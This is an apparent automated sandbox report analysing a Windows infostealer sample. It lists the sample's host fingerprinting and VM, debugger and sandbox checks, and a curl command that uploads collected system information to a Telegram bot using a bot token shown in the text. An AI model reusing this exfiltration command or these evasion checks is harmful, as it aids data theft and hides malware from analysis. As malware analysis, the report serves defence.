Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9KEZfGRjyK.exe

Overview

General Information

Sample name:9KEZfGRjyK.exe
renamed because original name is a hash value
Original sample name:73b0e64dcc0df2f2ac4d461245021e6a.exe
Analysis ID:1578571
MD5:73b0e64dcc0df2f2ac4d461245021e6a
SHA1:ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
SHA256:99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
Tags:exeuser-meanjellybeanx
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contain functionality to detect virtual machines
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • 9KEZfGRjyK.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\9KEZfGRjyK.exe" MD5: 73B0E64DCC0DF2F2AC4D461245021E6A)
    • WMIC.exe (PID: 7512 cmdline: "wmic" bios get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7576 cmdline: "wmic" baseboard get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7640 cmdline: "wmic" cpu get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7736 cmdline: "wmic" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7792 cmdline: "wmic" diskdrive get model,size MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7860 cmdline: "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • getmac.exe (PID: 7928 cmdline: "getmac" MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • systeminfo.exe (PID: 8048 cmdline: "systeminfo" MD5: EE309A9C61511E907D87B10EF226FDCD)
      • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 8124 cmdline: "tasklist" /m sbiedll.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 8184 cmdline: "tasklist" /m dbghelp.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7280 cmdline: "tasklist" /m api_log.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3104 cmdline: "tasklist" /m dir_watch.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 5928 cmdline: "tasklist" /m pstorec.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3756 cmdline: "tasklist" /m vmcheck.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3992 cmdline: "tasklist" /m wpespy.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7312 cmdline: "wmic" computersystem get model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7512 cmdline: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7580 cmdline: "tasklist" /fi "IMAGENAME eq vboxservice.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7688 cmdline: "tasklist" /fi "IMAGENAME eq vboxtray.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7772 cmdline: "wmic" csproduct get identifyingnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5740 cmdline: "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Machine Learning detection for sample
Source: 9KEZfGRjyK.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F410CBF0 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036,0_2_00007FF7F410CBF0
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: 9KEZfGRjyK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: data.pdb source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 source: 9KEZfGRjyK.exe
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411EB20 CloseHandle,FindFirstFileW,FindClose,0_2_00007FF7F411EB20

Networking

barindex
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*Content-Length: 3664Content-Type: multipart/form-data; boundary=------------------------edbae48fbd31f91b
Source: curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: curl.exe, 0000002D.00000002.2423334465.00000265942FF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422937156.00000265942FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument&
Source: curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC:
Source: curl.exe, 0000002D.00000002.2423296304.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422964793.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram.
Source: curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentc
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt9
Source: 9KEZfGRjyK.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2

System Summary

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411F200 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7F411F200
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411F0E0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7F411F0E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41027200_2_00007FF7F4102720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41218F00_2_00007FF7F41218F0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411FDF00_2_00007FF7F411FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41275200_2_00007FF7F4127520
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41018100_2_00007FF7F4101810
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41311400_2_00007FF7F4131140
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41171300_2_00007FF7F4117130
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41323B00_2_00007FF7F41323B0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F413EF000_2_00007FF7F413EF00
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F412D0000_2_00007FF7F412D000
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41360800_2_00007FF7F4136080
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411E0600_2_00007FF7F411E060
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F41339300_2_00007FF7F4133930
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4135A900_2_00007FF7F4135A90
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4129AF00_2_00007FF7F4129AF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411BB600_2_00007FF7F411BB60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4132C200_2_00007FF7F4132C20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4136CA00_2_00007FF7F4136CA0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F410FCF00_2_00007FF7F410FCF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: String function: 00007FF7F41353F0 appears 61 times
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: String function: 00007FF7F410F4E0 appears 69 times
Source: system_info.txt.0.drBinary string: EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: system_info.txt.0.drBinary string: Boot Device: \Device\HarddiskVolume1
Source: classification engineClassification label: mal68.troj.evad.winEXE@64/2@1/2
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411F330 GetModuleHandleW,FormatMessageW,GetLastError,0_2_00007FF7F411F330
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile created: C:\Users\user\Desktop\system_info.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: 9KEZfGRjyK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\9KEZfGRjyK.exe "C:\Users\user\Desktop\9KEZfGRjyK.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get name
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,size
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"
Source: C:\Windows\System32\getmac.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get model
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
